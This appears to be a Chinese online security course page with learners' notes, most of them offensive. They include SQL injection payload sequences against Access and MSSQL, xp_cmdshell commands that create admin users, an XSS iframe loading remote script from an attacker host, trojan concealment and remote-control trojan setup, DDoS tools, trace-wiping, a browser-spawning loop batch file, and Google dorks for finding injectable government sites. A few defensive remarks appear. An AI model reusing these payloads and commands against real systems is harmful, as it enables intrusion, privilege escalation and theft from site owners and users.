21人加入学习
(0人评价)
安全测试与深度防御
价格 ¥ 599.00
课程还未发布,不允许加入和购买

漏扫:nessus,appscan

web应用:ibm appscan,awvs,webravor

手工渗透:

经验积累,可以去discuz论坛找漏洞知识看。

前期社会工程学积累:

域名:www.nihao.com,nslookup

企业信息:法人,联系人,地址,无线:bt5,卡王,奶瓶

虚拟主机:同个主机绑定多个域名

网络拓朴

发现漏洞

ftp用x-scan

清除痕迹用killer.exe

[展开全文]

病毒木马隐藏技术:

1.rar:   解压前:ma.exe

解压后:qq.exe

2.伪装成图片及记事本图标:.jpg .txt

3.利用捆绑器:正常文件和木马

4.源分发隐藏:即代码中就有木马了。

5.hook

6.文件资源区

7.进程守护:a,b,c

8.dll注入进程

9.dll本地劫持

手工杀马:

vmxp:

installrite:快照

snap1,snap2

avafind:硬盘快速索引:ntdhcp.exe

进程管理工具:icesword:冰刃,snipeword:狙剑

启动项:msconfig

服务:

文件位置:靠经验了

 

手工杀毒:

icesword:可疑进程

结束进程

icesword-进程--winlogin.exe--右键--模块信息--强制解除

 

ie劫持:

 

[展开全文]

xss跨站:

注入主要针对服务端,跨站主要针对客户端,所有的输入点都是攻击源。

1.测试漏洞:<script>alert()</script>

2.挂马

<iframe src=http://ip/a.js></iframe>

POST方式要改成get

作用1:盗cookie

2.domain:路径

[展开全文]

arp -a:显示本地arp缓存。

arp-s:绑定

防arp欺骗可以用静态arp缓存表

怎么绑?

arp -s ip mac这个会重启失效

突破arp防火墙:

基于内容的攻击

[展开全文]

ddos:拒绝服务、分布式攻击

tcp三次握手:

S-syn:请求连接

F-fin:结束连接

A-ack:确认 acknumber=对方seq+1

R-rst:复位

三次握手

常用工具:nb,ntdos,中国网络制造,傀儡僵尸

挂马,外挂绑马:

one:配置远程控制木马:灰鸽子,pcshare,魔术,波尔。

pcshare无限版:--生成客户端 写ip,端口808未被占用

 

two:穿墙.dll注入ie进程 

死亡之ping

阿拉丁:构造udp畸形包

nb用来控制肉鸡,用法:hosts复制到c:\winnt\system32\drivers\etc

启动http.exe--配置--目录:nb目录

专业抗dos设备:黑洞,冰盾

穿专业设备:全面模拟正常访问

[展开全文]

php.ini

magic_quotes_gpc=on

单双引号,斜杠等前面加转义字符

union查询中如果是oracle数据库一定要加表名,而且前后表对应列的数据类型要兼容。利用这个可以判断前表那列的字符,

如果前表出错,将返回后表的结果

手工注入:

判断注入点 and1=1/and 1=2

判断用户名字id=-1 union select user()>0

判断版本号:id=-1 union select version()

判断当前连接数据库:id=-1unon select database()

判断表名:

id=-1 unionselect 1 from dv_admin

判断值:

 id=-1 union select username from dv_admin

读文件:load_file(c:\boot.ini)路径要转为16进制

自动化工具:pangolin

[展开全文]

1.数据库的提权

one:        先要建立数据库的用户,再将用户加入到sysadmin组(报错才是可能可以注入)

语句:  ;exec master..sp_addlogin hyqkx1977,888888;--

two:把用户加入到sysadmin

three:查看数据用户

four:利用漏洞

数据库连接器:查询分析器--文件--连接:数据库服务器ip

 

2.操作系统的提权

one.建立操作系统的用户。

;exec master..xp_cmdshell 'net user hacker 88888 /add' --

two.将建立的用户加入administrastors组

;exec master..xp_cmdshell '

three:利用远程桌面连接:port 3389

3.能读系统文件

one:利用查询分析器连接数据库

two:create table tablename(....)

three bulk insert vvboot from 'c:\boot.ini'

four:select * from vvboot

4.能向系统写文件

装逼批处理代码:

cmd.cmd

start " good" /high cmd.cmd & exit

a.bat

:1

start iexplore.exe

goto 1

 

写文件

;exec master..xp_cmdshell 'echo aaa >>c:u.txt'--(两个大于号代表追加)

5.防xp_cmdshell

;exec master..sp_dropextendedproc 'xp_cmdshell'

终极防:

xp_cmdshell,防未公布溢出漏洞

删除所有权限,添加administrstor--完全控制

6.注入防范

WAF

[展开全文]

手工注入MSSQL:

字典表,函数多

1.判断数据库类型

构造出错信息 and admin>0

2.判断注入点:

and 1=1

and 1=2

3.判断数据库的版本号:

and @@version>0

4.查看当前连接数据库用户名:

and user>o

dbo=sa mssql 1433端口配上弱口令无敌

5.查看当前连接数据库名:

and db_name()>0可能后来有些版本没了此函数

6.查看其它数据库:dbid=6,7,8

and (select name from master.dbo.sysdatabases where  dbid=6)>1

7.判断表名:

and (select top 1 name from sysobjects where xtype='u' and status>0)>0

8.判断其他表:name not in ('xxx','xx')

9.判断列:

and (select Top 1 col_name(object_id('admin'),1)from sysobjects)>0

10.判断值:

and (select username from admin)>0

11.修改口令

update  article.dbo.admin set password='a123456' where username='admin';--

--:注释符

php注释符#

 

 

 

[展开全文]

入侵实例:方法

1.入侵论坛:dvbbs

#:%23

%:25

空格:%20 and %

id=1

id=9999999

第二个/替换为%5c

id[]=1

apsx:a.asp

jsp:%81,源代码

.Jsp

.js%2527

2.上传

[展开全文]

判断注入点:

www.xx.xom/a.asp?id=1

and 1=1 返回正常

and 1=1 返回错误

and:逻辑与 A and B

or:逻辑与;A and B:只要一个为真结果都返真

万能口令:'or'='or'民办大学网站这样很多

 

判断数据库的类型:

access 独有表:mssysobjects

mssql:sysobjects

oracle:sys.user_tables

 

手工注入access

1.判断表名:admin;user,userinfo

判断表存在方法:(select count(*) from admin)>0

判断列存在方法:

and (select count(admin_user) from admin)>0

判断长度:len(admin_user)>4

and (select len(admin_user) from admin)>4

md5密码16位

判断值:left(admin_user,2)='aa'

and (select left(admin_user,i) from admin='a')

自动化工具:

domain,ad,管中

收索:

google : inurl:.gov asp+id

baidu: inurl:asp?id=

以上小心使用。

1.判断注入点

2.判断表名

3.判断列

4.判断列长度

5.判断值

6.自动化工具

 

 

[展开全文]